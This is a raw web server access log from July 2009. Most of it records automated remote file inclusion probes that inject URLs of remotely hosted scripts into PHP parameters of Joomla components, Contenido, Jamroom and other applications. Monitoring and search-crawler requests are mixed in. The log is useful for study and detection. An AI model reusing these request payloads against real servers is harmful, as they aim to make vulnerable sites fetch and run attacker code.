209.59.12.99 - - [26/Jul/2009:00:01:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
115.88.240.91 - - [26/Jul/2009:00:02:14 -0400] "GET /logs/access_log.Q109053000%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:02:14 -0400] "GET /logs/access_log.Q109051700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:02:21 -0400] "GET /logs/access_log.Q109051400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:02:56 -0400] "GET /logs/error_log.Q109053000%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:03:06 -0400] "GET /logs/error_log.Q109051700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:03:18 -0400] "GET /logs/error_log.Q109051400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:03:43 -0400] "GET /logs/access_log.Q109062400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:03:54 -0400] "GET /logs/access_log.Q109061300%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:04:18 -0400] "GET /logs/error_log.Q109061000%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:04:18 -0400] "GET /logs/error_log.Q109052400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:04:44 -0400] "GET /logs/error_log.Q109060400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:04:55 -0400] "GET /images/_notes/nav_store_search_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
115.88.240.91 - - [26/Jul/2009:00:04:56 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:04:56 -0400] "GET /logs/error_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:04:56 -0400] "GET /logs/error_log.Q109052300%20%20//admin/business_inc/saveserver.php?thisdir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.33.219.15 - - [26/Jul/2009:00:04:57 -0400] "GET /logs/access_log.Q109062100%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 268 "-" "-"
66.33.219.15 - - [26/Jul/2009:00:04:57 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 240 "-" "-"
66.33.219.15 - - [26/Jul/2009:00:04:57 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 245 "-" "-"
122.153.28.140 - - [26/Jul/2009:00:05:53 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:05:57 -0400] "GET /logs/access_log.Q109052500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:05:59 -0400] "GET /logs/access_log.Q109052500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:05:59 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:05:59 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:18 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:18 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:18 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:19 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:19 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:19 -0400] "GET /logs/access_log.Q109052500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:25 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:25 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:25 -0400] "GET /logs/access_log.Q109052500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:30 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:30 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:30 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:00:06:32 -0400] "GET /logs/access_log.Q109062500//include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:32 -0400] "GET //include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:32 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:35 -0400] "GET /logs/access_log.Q109062500//include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:35 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
87.20.186.139 - - [26/Jul/2009:00:06:39 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:06:39 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:06:39 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:00:06:45 -0400] "GET /logs/access_log.Q109062500//include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:45 -0400] "GET //include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
218.38.136.251 - - [26/Jul/2009:00:06:45 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://urogyn.co.kr/uro//include/cmss/yes.txt??%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
209.59.12.99 - - [26/Jul/2009:00:06:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.28.140 - - [26/Jul/2009:00:06:49 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:51 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:52 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:06:52 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:07:01 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:07:18 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:08:38 -0400] "GET /images/over-index5_pliers.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.234.7.92 - - [26/Jul/2009:00:09:32 -0400] "GET /xGB.php?act=admin&do=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:09:32 -0400] "GET /logs/xGB.php?act=admin&do=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:09:33 -0400] "GET /logs/access_log.Q109070700/xGB.php?act=admin&do=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:10:09 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:10:09 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:10:09 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:11:05 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:11:30 -0400] "GET /images/_notes/store_anim.gif.mno HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:00:11:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.28.140 - - [26/Jul/2009:00:11:57 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://http://80.24.176.145/time//appserv/new.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
122.153.28.140 - - [26/Jul/2009:00:11:57 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://http://80.24.176.145/time//appserv/new.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
122.153.28.140 - - [26/Jul/2009:00:11:57 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://http://80.24.176.145/time//appserv/new.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
87.20.186.139 - - [26/Jul/2009:00:12:12 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:12:12 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://http://80.24.176.145/time//appserv/new.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
87.20.186.139 - - [26/Jul/2009:00:13:30 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:13:33 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:13:34 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:13:35 -0400] "GET /logs/access_log.Q109070700%20%20/xGB.php?act=admin&do=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:16:22 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04941001 HTTP/1.1" 200 27017 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:00:16:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:00:18:05 -0400] "GET /images/_notes/download_cat_instr.4_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.190.63 - - [26/Jul/2009:00:18:32 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:18:32 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:18:32 -0400] "GET /logs/access_log.Q109052800//skin/zero_vote/ask_password.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:18:55 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:00:19:29 -0400] "GET /index.php?redir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:00:19:29 -0400] "GET /logs/index.php?redir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:00:19:29 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:19:30 -0400] "GET //forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:19:30 -0400] "GET /logs/access_log.Q109062800//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:19:30 -0400] "GET /logs//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:00:19:40 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.33.219.15 - - [26/Jul/2009:00:20:14 -0400] "GET //?_PHPLIB[libdir]=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 200 452 "-" "-"
66.33.219.15 - - [26/Jul/2009:00:20:14 -0400] "GET /logs/access_log.Q109050700%20//?_PHPLIB[libdir]=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 227 "-" "-"
66.33.219.15 - - [26/Jul/2009:00:20:14 -0400] "GET /logs//?_PHPLIB[libdir]=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 200 11071 "-" "-"
209.59.12.99 - - [26/Jul/2009:00:21:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.234.7.92 - - [26/Jul/2009:00:23:17 -0400] "GET /logs/access_log.Q109052400%20////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:00:23:17 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 454 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:00:23:19 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 11073 "-" "libwww-perl/5.79"
218.237.66.229 - - [26/Jul/2009:00:23:25 -0400] "GET //forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:00:23:25 -0400] "GET /logs//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:00:23:25 -0400] "GET /logs/access_log.Q109062800//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:00:23:52 -0400] "GET /logs/access_log.Q109052800//include/admin.lib.inc.php?site_path=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:00:23:52 -0400] "GET //include/admin.lib.inc.php?site_path=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:00:23:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:24:28 -0400] "GET /logs/access_log.Q109062800%20%20//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:00:24:34 -0400] "GET /logs/access_log.Q109070200//include/admin.lib.inc.php?site_path=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:00:24:19 -0400] "GET /logs/error_log.Q109071700 HTTP/1.0" 200 2892865 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [26/Jul/2009:00:24:39 -0400] "GET /images/_notes/download_order_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.28.140 - - [26/Jul/2009:00:25:10 -0400] "GET /logs/access_log.Q109062600%20%20//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:25:13 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:25:13 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:25:13 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:25:24 -0400] "GET /logs/access_log.Q109052400////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.234.7.92 - - [26/Jul/2009:00:25:24 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.234.7.92 - - [26/Jul/2009:00:25:24 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 11073 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.234.7.92 - - [26/Jul/2009:00:25:35 -0400] "GET /logs/access_log.Q109052400////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:00:25:37 -0400] "GET /logs/access_log.Q109062900////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:00:25:43 -0400] "GET /logs/access_log.Q109062200////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
203.173.40.87 - - [26/Jul/2009:00:26:28 -0400] "GET /logs/access_log.Q109070800/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
